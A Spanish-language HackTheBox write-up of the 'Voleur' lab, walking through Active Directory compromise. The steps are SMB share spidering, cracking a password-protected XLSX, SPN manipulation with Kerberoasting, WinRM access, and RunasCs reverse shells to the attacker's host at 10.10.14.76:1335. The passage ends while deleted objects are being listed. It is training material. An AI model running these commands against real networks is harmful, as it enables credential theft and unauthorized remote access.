This page looks best with JavaScript enabled

HackTheBox - Voleur

 •  ✍️ sckull
featured image

En Voleur se descubrio un archivo XLSX protegido el cual contenia credenciales. Con el analisis de bloodhound se identifico un usuario al que se realizo Kerberoasting permitiendo el acceso por WinRM. Se accedio a otro usuario a traves de runas donde se restauro un usuario eliminado. Con este ultimo se obtuvieron credenciales locales protegidas por DPAPI. Estas dieron acceso a una clave privada SSH. Tras acceder con esta, se descubrio un backup de la base de datos de Active Directory con archivos de registro los cuales permitieron escalar privilegios.

Nombre Voleur
OS

Windows

Puntos 30
Dificultad Medium
Fecha de Salida 2025-07-05
IP 10.10.11.76
Maker

baseDN

Rated 
{
    "type": "bar",
    "data":  {
        "labels": ["Cake", "VeryEasy", "Easy", "TooEasy", "Medium", "BitHard","Hard","TooHard","ExHard","BrainFuck"],
        "datasets": [{
            "label": "User Rated Difficulty",
            "data": [78, 66, 250, 253, 386, 170, 108, 31, 10, 17],
            "backgroundColor": ["#9fef00","#9fef00","#9fef00", "#ffaf00","#ffaf00","#ffaf00","#ffaf00", "#ff3e3e","#ff3e3e","#ff3e3e"]
        }]
    },
    "options": {
        "scales": {
          "xAxes": [{"display": false}],
          "yAxes": [{"display": false}]
        },
        "legend": {"labels": {"fontColor": "white"}},
        "responsive": true
      }
}

Machine Information: Voleur

La descripcion de la maquina emula una situacion “real” de un pentest proporcionando credenciales.

As is common in real life Windows pentests, you will start the Voleur box with credentials for the following account: ryan.naylor / HollowOct31Nyt

Recon

nmap

nmap muestra multiples puertos abiertos: dns (53), kerberos (88), ldap (389), rpc (135), smb (445), ssh (2222), winrm (5985).

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45

# Nmap 7.95 scan initiated Sun Jul  6 00:37:54 2025 as: /usr/lib/nmap/nmap --privileged -p53,88,135,139,389,445,464,593,636,2222,3268,3269,5985,9389,49664,49668,50624,50625,50626,50650,57843 -sV -sC -oN nmap_scan 10.10.11.76
Nmap scan report for 10.10.11.76
Host is up (0.26s latency).

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-07-06 14:37:46Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: voleur.htb0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
2222/tcp  open  ssh           OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 42:40:39:30:d6:fc:44:95:37:e1:9b:88:0b:a2:d7:71 (RSA)
|   256 ae:d9:c2:b8:7d:65:6f:58:c8:f4:ae:4f:e4:e8:cd:94 (ECDSA)
|_  256 53:ad:6b:6c:ca:ae:1b:40:44:71:52:95:29:b1:bb:c1 (ED25519)
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: voleur.htb0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
49664/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
50624/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
50625/tcp open  msrpc         Microsoft Windows RPC
50626/tcp open  msrpc         Microsoft Windows RPC
50650/tcp open  msrpc         Microsoft Windows RPC
57843/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC; OSs: Windows, Linux; CPE: cpe:/o:microsoft:windows, cpe:/o:linux:linux_kernel

Host script results:
| smb2-time: 
|   date: 2025-07-06T14:38:39
|_  start_date: N/A
|_clock-skew: 7h59m43s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Jul  6 00:39:41 2025 -- 1 IP address (1 host up) scanned in 106.98 seconds

Agregamos a nuestro archivo /etc/hosts los valores voleur.htb dc.voleur.htb.

Services Access

Las credenciales tienen acceso por ldap y smb a traves de kerberberos.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10

❯ faketime "$(ntpdate -q voleur.htb | cut -d ' ' -f 1,2)" netexec ldap 10.10.11.76 -u ryan.naylor -p HollowOct31Nyt -k
LDAP        10.10.11.76     389    DC               [*] None (name:DC) (domain:voleur.htb)
LDAP        10.10.11.76     389    DC               [+] voleur.htb\ryan.naylor:HollowOct31Nyt 
❯ faketime "$(ntpdate -q voleur.htb | cut -d ' ' -f 1,2)" netexec smb 10.10.11.76 -u ryan.naylor -p HollowOct31Nyt -k
SMB         10.10.11.76     445    10.10.11.76      [*]  x64 (name:10.10.11.76) (domain:10.10.11.76) (signing:True) (SMBv1:False) (NTLM:False)
SMB         10.10.11.76     445    10.10.11.76      [-] 10.10.11.76\ryan.naylor:HollowOct31Nyt KDC_ERR_WRONG_REALM 
❯ faketime "$(ntpdate -q voleur.htb | cut -d ' ' -f 1,2)" netexec smb dc.voleur.htb -u ryan.naylor -p HollowOct31Nyt -k
SMB         dc.voleur.htb   445    dc               [*]  x64 (name:dc) (domain:voleur.htb) (signing:True) (SMBv1:False) (NTLM:False)
SMB         dc.voleur.htb   445    dc               [+] voleur.htb\ryan.naylor:HollowOct31Nyt

Bloodhound & Analysis

Con las credenciales de ryan ejecutando el collector Bloodhound de netexec.

1
2
3
4
5
6
7
8

❯ faketime "$(ntpdate -q voleur.htb | cut -d ' ' -f 1,2)" netexec ldap 10.10.11.76 -u ryan.naylor -p HollowOct31Nyt -k --dns-server 10.10.11.76 --bloodhound --collection All
LDAP        10.10.11.76     389    DC               [*] None (name:DC) (domain:voleur.htb)
LDAP        10.10.11.76     389    DC               [+] voleur.htb\ryan.naylor:HollowOct31Nyt 
LDAP        10.10.11.76     389    DC               Resolved collection methods: group, session, psremote, container, acl, rdp, objectprops, localadmin, trusts, dcom
LDAP        10.10.11.76     389    DC               Using kerberos auth without ccache, getting TGT
LDAP        10.10.11.76     389    DC               Done in 00M 49S
LDAP        10.10.11.76     389    DC               Compressing output into /home/kali/.nxc/logs/DC_10.10.11.76_2025-07-06_084240_bloodhound.zip

Creamos un wordlist con la lista de usuarios.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16

❯ jq -r '.data[].Properties.name' blood/DC_10.10.11.76_2025-07-06_084240_users.json | tail -n +2 |  awk '{ print tolower($0) }' | cut -d '@' -f1 > users.txt
❯ wc -l users.txt
11 users.txt
❯ cat users.txt
jeremy.combs
svc_winrm
svc_iis
svc_backup
svc_ldap
lacey.miller
marie.bryant
ryan.naylor
krbtgt
guest
administrator

Users

Encontramos once usuarios registrados en el dominio.

image

Ryan

Este usuario no muestra ningun grupo o permiso sobre otro objeto.

image

svc_ldap

svc_ldap tiene permisos WriteSPN sobre svc_winrm. Tambien, tiene permisos GenericWrite a traves del grupo Restore_users sobre Lacey.Miller y Todd.Wolfe.

image

svc_winrm

Pertenece al grupo Remote Management Users por lo que al lograr el acceso a este usuario seria posible acceder por WinRM.

image

SMB

Observamos que ryan tiene acceso al recurso IT.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15

❯ faketime "$(ntpdate -q voleur.htb | cut -d ' ' -f 1,2)" netexec smb dc.voleur.htb -u ryan.naylor -p HollowOct31Nyt -k  --shares
SMB         dc.voleur.htb   445    dc               [*]  x64 (name:dc) (domain:voleur.htb) (signing:True) (SMBv1:False) (NTLM:False)
SMB         dc.voleur.htb   445    dc               [+] voleur.htb\ryan.naylor:HollowOct31Nyt 
SMB         dc.voleur.htb   445    dc               [*] Enumerated shares
SMB         dc.voleur.htb   445    dc               Share           Permissions     Remark
SMB         dc.voleur.htb   445    dc               -----           -----------     ------
SMB         dc.voleur.htb   445    dc               ADMIN$                          Remote Admin
SMB         dc.voleur.htb   445    dc               C$                              Default share
SMB         dc.voleur.htb   445    dc               Finance                         
SMB         dc.voleur.htb   445    dc               HR                              
SMB         dc.voleur.htb   445    dc               IPC$            READ            Remote IPC
SMB         dc.voleur.htb   445    dc               IT              READ            
SMB         dc.voleur.htb   445    dc               NETLOGON        READ            Logon server share 
SMB         dc.voleur.htb   445    dc               SYSVOL          READ            Logon server share

Utilizamos el modulo spider_plus de netexec para listar el recurso IT donde encontramos un archivo .xlsx.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41

❯ faketime "$(ntpdate -q voleur.htb | cut -d ' ' -f 1,2)" netexec smb dc.voleur.htb -u ryan.naylor -p HollowOct31Nyt -k -M spider_plus --share IT
SMB         dc.voleur.htb   445    dc               [*]  x64 (name:dc) (domain:voleur.htb) (signing:True) (SMBv1:False) (NTLM:False)
SMB         dc.voleur.htb   445    dc               [+] voleur.htb\ryan.naylor:HollowOct31Nyt 
SPIDER_PLUS dc.voleur.htb   445    dc               [*] Started module spidering_plus with the following options:
SPIDER_PLUS dc.voleur.htb   445    dc               [*]  DOWNLOAD_FLAG: False
SPIDER_PLUS dc.voleur.htb   445    dc               [*]     STATS_FLAG: True
SPIDER_PLUS dc.voleur.htb   445    dc               [*] EXCLUDE_FILTER: ['print$', 'ipc$']
SPIDER_PLUS dc.voleur.htb   445    dc               [*]   EXCLUDE_EXTS: ['ico', 'lnk']
SPIDER_PLUS dc.voleur.htb   445    dc               [*]  MAX_FILE_SIZE: 50 KB
SPIDER_PLUS dc.voleur.htb   445    dc               [*]  OUTPUT_FOLDER: /home/kali/.nxc/modules/nxc_spider_plus
SMB         dc.voleur.htb   445    dc               [*] Enumerated shares
SMB         dc.voleur.htb   445    dc               Share           Permissions     Remark
SMB         dc.voleur.htb   445    dc               -----           -----------     ------
SMB         dc.voleur.htb   445    dc               ADMIN$                          Remote Admin
SMB         dc.voleur.htb   445    dc               C$                              Default share
SMB         dc.voleur.htb   445    dc               Finance                         
SMB         dc.voleur.htb   445    dc               HR                              
SMB         dc.voleur.htb   445    dc               IPC$            READ            Remote IPC
SMB         dc.voleur.htb   445    dc               IT              READ            
SMB         dc.voleur.htb   445    dc               NETLOGON        READ            Logon server share 
SMB         dc.voleur.htb   445    dc               SYSVOL          READ            Logon server share 
SPIDER_PLUS dc.voleur.htb   445    dc               [+] Saved share-file metadata to "/home/kali/.nxc/modules/nxc_spider_plus/dc.voleur.htb.json".
SPIDER_PLUS dc.voleur.htb   445    dc               [*] SMB Shares:           8 (ADMIN$, C$, Finance, HR, IPC$, IT, NETLOGON, SYSVOL)
SPIDER_PLUS dc.voleur.htb   445    dc               [*] SMB Readable Shares:  4 (IPC$, IT, NETLOGON, SYSVOL)
SPIDER_PLUS dc.voleur.htb   445    dc               [*] SMB Filtered Shares:  1
SPIDER_PLUS dc.voleur.htb   445    dc               [*] Total folders found:  27
SPIDER_PLUS dc.voleur.htb   445    dc               [*] Total files found:    7
SPIDER_PLUS dc.voleur.htb   445    dc               [*] File size average:    3.55 KB
SPIDER_PLUS dc.voleur.htb   445    dc               [*] File size min:        22 B
SPIDER_PLUS dc.voleur.htb   445    dc               [*] File size max:        16.5 KB
❯ jq -r '.IT' /home/kali/.nxc/modules/nxc_spider_plus/dc.voleur.htb.json
{
  "First-Line Support/Access_Review.xlsx": {
    "atime_epoch": "2025-01-31 03:09:27",
    "ctime_epoch": "2025-01-29 03:39:51",
    "mtime_epoch": "2025-05-29 16:23:36",
    "size": "16.5 KB"
  }
}

Protected XLSX

Realizamos la descarga de este archivo, file muestra que esta protegido.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37

❯ faketime "$(ntpdate -q voleur.htb | cut -d ' ' -f 1,2)" netexec smb dc.voleur.htb -u ryan.naylor -p HollowOct31Nyt -k -M spider_plus --share IT -o DOWNLOAD_FLAG=True
SMB         dc.voleur.htb   445    dc               [*]  x64 (name:dc) (domain:voleur.htb) (signing:True) (SMBv1:False) (NTLM:False)
SMB         dc.voleur.htb   445    dc               [+] voleur.htb\ryan.naylor:HollowOct31Nyt 
SPIDER_PLUS dc.voleur.htb   445    dc               [*] Started module spidering_plus with the following options:
SPIDER_PLUS dc.voleur.htb   445    dc               [*]  DOWNLOAD_FLAG: True
SPIDER_PLUS dc.voleur.htb   445    dc               [*]     STATS_FLAG: True
SPIDER_PLUS dc.voleur.htb   445    dc               [*] EXCLUDE_FILTER: ['print$', 'ipc$']
SPIDER_PLUS dc.voleur.htb   445    dc               [*]   EXCLUDE_EXTS: ['ico', 'lnk']
SPIDER_PLUS dc.voleur.htb   445    dc               [*]  MAX_FILE_SIZE: 50 KB
SPIDER_PLUS dc.voleur.htb   445    dc               [*]  OUTPUT_FOLDER: /home/kali/.nxc/modules/nxc_spider_plus
SMB         dc.voleur.htb   445    dc               [*] Enumerated shares
SMB         dc.voleur.htb   445    dc               Share           Permissions     Remark
SMB         dc.voleur.htb   445    dc               -----           -----------     ------
SMB         dc.voleur.htb   445    dc               ADMIN$                          Remote Admin
SMB         dc.voleur.htb   445    dc               C$                              Default share
SMB         dc.voleur.htb   445    dc               Finance                         
SMB         dc.voleur.htb   445    dc               HR                              
SMB         dc.voleur.htb   445    dc               IPC$            READ            Remote IPC
SMB         dc.voleur.htb   445    dc               IT              READ            
SMB         dc.voleur.htb   445    dc               NETLOGON        READ            Logon server share 
SMB         dc.voleur.htb   445    dc               SYSVOL          READ            Logon server share 
SPIDER_PLUS dc.voleur.htb   445    dc               [+] Saved share-file metadata to "/home/kali/.nxc/modules/nxc_spider_plus/dc.voleur.htb.json".
SPIDER_PLUS dc.voleur.htb   445    dc               [*] SMB Shares:           8 (ADMIN$, C$, Finance, HR, IPC$, IT, NETLOGON, SYSVOL)
SPIDER_PLUS dc.voleur.htb   445    dc               [*] SMB Readable Shares:  4 (IPC$, IT, NETLOGON, SYSVOL)
SPIDER_PLUS dc.voleur.htb   445    dc               [*] SMB Filtered Shares:  1
SPIDER_PLUS dc.voleur.htb   445    dc               [*] Total folders found:  20
SPIDER_PLUS dc.voleur.htb   445    dc               [*] Total files found:    4
SPIDER_PLUS dc.voleur.htb   445    dc               [*] File size average:    5.14 KB
SPIDER_PLUS dc.voleur.htb   445    dc               [*] File size min:        22 B
SPIDER_PLUS dc.voleur.htb   445    dc               [*] File size max:        16.5 KB
SPIDER_PLUS dc.voleur.htb   445    dc               [*] File unique exts:     3 (inf, xlsx, ini)
SPIDER_PLUS dc.voleur.htb   445    dc               [*] Downloads successful: 4
SPIDER_PLUS dc.voleur.htb   445    dc               [+] All files processed successfully.
❯ file /home/kali/.nxc/modules/nxc_spider_plus/dc.voleur.htb/IT/First-Line\ Support/Access_Review.xlsx
/home/kali/.nxc/modules/nxc_spider_plus/dc.voleur.htb/IT/First-Line Support/Access_Review.xlsx: CDFV2 Encrypted

Al intentar abrirlo este muestra que necesita una contrasena.

image

Cracking the Hash

Ejecutamos office2john sobre el archivo para obtener el hash y luego john con el wordlist rockyou para obtener la contrasena.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15

❯ office2john Access_Review.xlsx
Access_Review.xlsx:$office$*2013*100000*256*16*a80811402788c037b50df976864b33f5*500bd7e833dffaa28772a49e987be35b*7ec993c47ef39a61e86f8273536decc7d525691345004092482f9fd59cfa111c
❯ office2john Access_Review.xlsx > xlsx_hash
❯ john xlsx_hash --wordlist=$ROCK
Using default input encoding: UTF-8
Loaded 1 password hash (Office, 2007/2010/2013 [SHA1 512/512 AVX512BW 16x / SHA512 512/512 AVX512BW 8x AES])
Cost 1 (MS Office version) is 2013 for all loaded hashes
Cost 2 (iteration count) is 100000 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
football1        (Access_Review.xlsx)     
1g 0:00:00:01 DONE (2025-07-06 02:00) 1.000g/s 832.0p/s 832.0c/s 832.0C/s football1..legolas
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

Users Information

Tras abrir el archivo observamos una lista de usuarios con titulo, permiso y notas. Se muestran contrasenas de usuarios.

User Job Title Permissions Notes
Ryan.Naylor First‑Line Support Technician SMB Has Kerberos Pre‑Auth disabled temporarily to test legacy systems.
Marie.Bryant First‑Line Support Technician SMB
Lacey.Miller Second‑Line Support Technician Remote Management Users
Todd.Wolfe Second‑Line Support Technician Remote Management Users Leaver. Password was reset to NightT1meP1dg3on14 and account deleted.
Jeremy.Combs Third‑Line Support Technician Remote Management Users Has access to Software folder.
Administrator Administrator Domain Admin Not to be used for daily tasks!
Service Account Permissions Notes
svc\backup Windows Backup Speak to Jeremy!
svc\ldap LDAP Services P/W – M1XyC9pW7qT5Vn
svc\iis IIS Administration P/W – N5pXyW1VqM7CZ8
svc\winrm Remote Management Need to ask Lacey as she reset this recently.

Check Passwords

Ejecutamos netexec con la lista de usuarios y contrasenas, se muestran dos pares de credenciales validas.

1
2
3
4

❯ faketime "$(ntpdate -q voleur.htb | cut -d ' ' -f 1,2)" netexec ldap dc.voleur.htb -u users.txt -p pass.txt -k --continue-on-success | grep '[+]'
LDAP                     dc.voleur.htb   389    DC               [+] voleur.htb\svc_ldap:M1XyC9pW7qT5Vn 
LDAP                     dc.voleur.htb   389    DC               [+] voleur.htb\svc_iis:N5pXyW1VqM7CZ8

svc_ldap -> svc_winrm

Como sabemos svc_ldap tiene permisos WriteSPN sobre svc_winrm, modificamos el SPN (ServicePrincipalName) de este usuario para luego realizar Kerberoasting y obtener el hash del usuario.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19

❯ faketime "$(ntpdate -q voleur.htb | cut -d ' ' -f 1,2)" impacket-getTGT -dc-ip 10.10.11.76 voleur.htb/svc_ldap:M1XyC9pW7qT5Vn ; export KRB5CCNAME=svc_ldap.ccache
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Saving ticket in svc_ldap.ccache
❯ faketime "$(ntpdate -q voleur.htb | cut -d ' ' -f 1,2)" bloodyAD --host dc.voleur.htb -d voleur.htb -k set object svc_winrm servicePrincipalName -v 'sc/kull.htb'
[+] svc_winrm's servicePrincipalName has been updated
❯ faketime "$(ntpdate -q voleur.htb | cut -d ' ' -f 1,2)" impacket-GetUserSPNs -request -no-pass -k -dc-ip 10.10.11.76 -dc-host dc.voleur.htb voleur.htb/ -outputfile svc_winrm_k
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

ServicePrincipalName  Name       MemberOf                                                PasswordLastSet             LastLogon                   Delegation 
--------------------  ---------  ------------------------------------------------------  --------------------------  --------------------------  ----------
sc/kull.htb            svc_winrm  CN=Remote Management Users,CN=Builtin,DC=voleur,DC=htb  2025-01-31 03:10:12.398769  2025-07-06 09:49:43.160944             



❯ cat svc_winrm_k
$krb5tgs$23$*svc_winrm$VOLEUR.HTB$voleur.htb/svc_winrm*$712038502f0567bd5cdd3c59ef1415a6$d6b4cb03005ed868b24731614bf067db8250a800de40e6226c07cefc20a0c219badb0bb91e2b2dd88111f8ab57bfe41cad573e8c8a4867409fe292310fb0dcd649ef2ba8fb9e7788d07e5d28124640b59c3d5fda8466831e2249c4df9bdd15f7166a4a3d752350307836101fa3a045fda2f51810f3301d9ad23d522411369144965973faccb83366d9466bcb8775671fdb7efd27bbdf398c1615d746d6c01d7ae1729ec73ac225f196ba2a84ef51ccb871c3f6d07dbf8d5a162c499d183ba0492b6c390a828722ee7a1eccbd06d9a037b91b8fec8c956868d70af7feadb9e0586b1244530e40fd1d0550b4328e3c09a239efb4892cf9b7f736a3089ee59e50dfb8bf79dfb9ae291c96e0d83339d2f64913030099e033d0cd82de699a2042ed74ac2fe4a7c2c09474d0c28956c6d978b94b40df445c8ebcb6c4dd580fd3d92289268e119657dc34a5c6ab5aadce453a66e7d011bb3d68ad818e552840e0a3f1dabdcbaaa2a4b558ebe7156d9f6dfe0c0207e44eea2c443926c7d17ba6c1b970c36daaebaefcf98b469e4b2418543e285215eaed1a63e0ad0df0677ca12c8a39b2ecd4da1093c3ffe35fcafc0d36f6d65e618ce53dbd8428239583919e9b2accec4d6482b9c36c93ffc8472e9d0e392d164ab191c6a861d3f7c1b40fc7cb75402f37fc6de2be9897db963f826d18d651385dacae639308bf6b4ee10a92695a1aab495952992b47697658f80729d629e06dac245cfe487b0008ae11df73258f06b643a005f775c1e8f499a8ba94f1b637e6aa5dff5fee01cbae4e820f726971cdd2efc50da0eba1e2b322b3fc4e48bc9ea10ee2077d4e6d61685f36bb8835e49b52fd49d9114f02dfd2d55741f8268e224e1cdac6b528700defe8795a059ce00df4b81731b7f7e6c5cbc7c30cd3e5d0c53f40f735ac807292f924ed6759aace23a3401b28b4f85bb75d6aeb46928cc3760784702450e1696e9cb0c44846da9b5626699181ca94aaaef4de4092949ccc9b07e87977778d5c7c933c2963e0862aebcfd2082a99e7fcf454ce3241b20dd6b040a1539b23dc7df328a3bc600e924fc6141ded19a5ec68f718795a619b85f6fd15ff47020762f2989f59ba221fb2714afbc8927d62dfd40a31ec5b13ff71400fdc5f833b592934bb9dd579e9ada845c27508f7a2a9937c6205697906c2fb96d79acc7714aad037736fa2004a6d1f018236f98e2fef5ff46f9f30e85ea06ca9135f8189217f8202170c6fdd4511b8f49f4b9d89bd144e2251436df7e7c1a543b53343dfef4ad523b2e86bd5eabb2a617efdc623b0670870633d5d5ca5ea4c41ef635158b7e507a473e7f36a67356649cea129b43af7f1aded7aed55f927bb7ce3cf5628d26327ea893d132d17debeb345a01ef415b96aed9fa9319f4d54642a25f81feb1c3664f3fd064cd10a17571f8d2f1ce22ac8684e6ba90dbedd772823213a54f3bf

1
2
3
4

faketime "$(ntpdate -q voleur.htb | cut -d ' ' -f 1,2)" impacket-getTGT -dc-ip 10.10.11.76 voleur.htb/svc_ldap:M1XyC9pW7qT5Vn
export KRB5CCNAME=svc_ldap.ccache
faketime "$(ntpdate -q voleur.htb | cut -d ' ' -f 1,2)" bloodyAD --host dc.voleur.htb -d voleur.htb -k set object svc_winrm servicePrincipalName -v 'sc/kull.htb'
faketime "$(ntpdate -q voleur.htb | cut -d ' ' -f 1,2)" impacket-GetUserSPNs -request -no-pass -k -dc-ip 10.10.11.76 -dc-host dc.voleur.htb voleur.htb/ -outputfile svc_winrm_k

Cracking the Hash

Tras ejecutar john sobre el hash logramos obtener la contrasena.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10

❯ john svc_winrm_k --wordlist=$ROCK
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
AFireInsidedeOzarctica980219afi (?)     
1g 0:00:00:04 DONE (2025-07-06 02:29) 0.2267g/s 2601Kp/s 2601Kc/s 2601KC/s AHANACK6978012..AFITA4162
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

svc_winrm

svc_winrm pertenece al grupo Remote Management Users por lo que puede acceder por WinRM. Primero, creamos el archivo krb5.conf con la configuracion de voleur.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15

[libdefaults]
        default_realm = VOLEUR.HTB
        dns_lookup_realm = false
        dns_lookup_kdc = false

[realms]
        VOLEUR.HTB = {
                kdc = dc.voleur.htb
                admin_server = dc.voleur.htb
                default_domain = voleur.htb
        }

[domain_realm]
        voleur.htb = VOLEUR.HTB
        .voleur.htb = VOLEUR.HTB

Accedimos por WinRM iniciando con la ejecucion de impacket-getTGT para obtener un ticket que luego utilizamos en evil-winrm para finalmente obtener una shell y la flag user.txt.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32

❯ faketime "$(ntpdate -q voleur.htb | cut -d ' ' -f 1,2)" impacket-getTGT -dc-ip 10.10.11.76 voleur.htb/svc_winrm:AFireInsidedeOzarctica980219afi ; export KRB5CCNAME=svc_winrm.ccache
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Saving ticket in svc_winrm.ccache
❯ faketime "$(ntpdate -q voleur.htb | cut -d ' ' -f 1,2)" evil-winrm -i dc.voleur.htb -r VOLEUR.HTB
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc_winrm\Documents> whoami
voleur\svc_winrm
*Evil-WinRM* PS C:\Users\svc_winrm\Documents> dir -force ../Desktop


    Directory: C:\Users\svc_winrm\Desktop


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a-hs-         1/29/2025   7:07 AM            282 desktop.ini
-a----         1/29/2025   7:07 AM           2312 Microsoft Edge.lnk
-ar---          7/6/2025   8:44 AM             34 user.txt


*Evil-WinRM* PS C:\Users\svc_winrm\Documents> cat ../Desktop/user.txt
6e89e40cc1a86194030a4fd835c23757
*Evil-WinRM* PS C:\Users\svc_winrm\Documents>

1
2
3
4

# svc_winrm
faketime "$(ntpdate -q voleur.htb | cut -d ' ' -f 1,2)" impacket-getTGT -dc-ip 10.10.11.76 voleur.htb/svc_winrm:AFireInsidedeOzarctica980219afi
export KRB5CCNAME=svc_winrm.ccache
faketime "$(ntpdate -q voleur.htb | cut -d ' ' -f 1,2)" evil-winrm -i dc.voleur.htb -r VOLEUR.HTB

1
2
3
4
5
6
7
8
9

# svc_iis
*Evil-WinRM* PS C:\Users\svc_winrm\Documents> .\RunasCs.exe svc_iis N5pXyW1VqM7CZ8 powershell.exe -r 10.10.14.76:1335
[*] Warning: User profile directory for user svc_iis does not exists. Use --force-profile if you want to force the creation.
[*] Warning: The logon for user 'svc_iis' is limited. Use the flag combination --bypass-uac and --logon-type '8' to obtain a more privileged token.

[+] Running in session 0 with process function CreateProcessWithLogonW()
[+] Using Station\Desktop: Service-0x0-4ee52$\Default
[+] Async process 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' with pid 6904 created in background.
*Evil-WinRM* PS C:\Users\svc_winrm\Documents>

User - svc_ldap

A traves de RunasCS logramos la ejecucion de una shell para el usuario svc_ldap.

1
2
3
4
5
6
7
8

# svc_ldap
*Evil-WinRM* PS C:\Users\svc_winrm\Documents> .\RunasCs.exe svc_ldap M1XyC9pW7qT5Vn powershell.exe -r 10.10.14.76:1335
[*] Warning: The logon for user 'svc_ldap' is limited. Use the flag combination --bypass-uac and --logon-type '8' to obtain a more privileged token.

[+] Running in session 0 with process function CreateProcessWithLogonW()
[+] Using Station\Desktop: Service-0x0-cde27$\Default
[+] Async process 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' with pid 2468 created in background.
*Evil-WinRM* PS C:\Users\svc_winrm\Documents>

Este usuario es miembro de RESTORE_USERS por lo que listamos los objectos eliminados. Entre estos encontramos al usuario Todd Wolfe.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85

PS C:\Windows\system32> Get-ADObject -filter 'isDeleted -eq $true' -includeDeletedObjects -Properties *


CanonicalName                   : voleur.htb/Deleted Objects
CN                              : Deleted Objects
Created                         : 1/29/2025 12:42:27 AM
createTimeStamp                 : 1/29/2025 12:42:27 AM
Deleted                         : True
Description                     : Default container for deleted objects
DisplayName                     : 
DistinguishedName               : CN=Deleted Objects,DC=voleur,DC=htb
dSCorePropagationData           : {12/31/1600 4:00:00 PM}
instanceType                    : 4
isCriticalSystemObject          : True
isDeleted                       : True
LastKnownParent                 : 
Modified                        : 1/29/2025 4:44:42 AM
modifyTimeStamp                 : 1/29/2025 4:44:42 AM
Name                            : Deleted Objects
ObjectCategory                  : CN=Container,CN=Schema,CN=Configuration,DC=voleur,DC=htb
ObjectClass                     : container
ObjectGUID                      : 587cd8b4-6f6a-46d9-8bd4-8fb31d2e18d8
ProtectedFromAccidentalDeletion : 
sDRightsEffective               : 0
showInAdvancedViewOnly          : True
systemFlags                     : -1946157056
uSNChanged                      : 13005
uSNCreated                      : 5659
whenChanged                     : 1/29/2025 4:44:42 AM
whenCreated                     : 1/29/2025 12:42:27 AM

accountExpires                  : 9223372036854775807
badPasswordTime                 : 0
badPwdCount                     : 0
CanonicalName                   : voleur.htb/Deleted Objects/Todd Wolfe
                                  DEL:1c6b1deb-c372-4cbb-87b1-15031de169db
CN                              : Todd Wolfe
                                  DEL:1c6b1deb-c372-4cbb-87b1-15031de169db
codePage                        : 0
countryCode                     : 0
Created                         : 1/29/2025 1:08:06 AM
createTimeStamp                 : 1/29/2025 1:08:06 AM
Deleted                         : True
Description                     : Second-Line Support Technician
DisplayName                     : Todd Wolfe
DistinguishedName               : CN=Todd Wolfe\0ADEL:1c6b1deb-c372-4cbb-87b1-15031de169db,CN=Deleted 
                                  Objects,DC=voleur,DC=htb
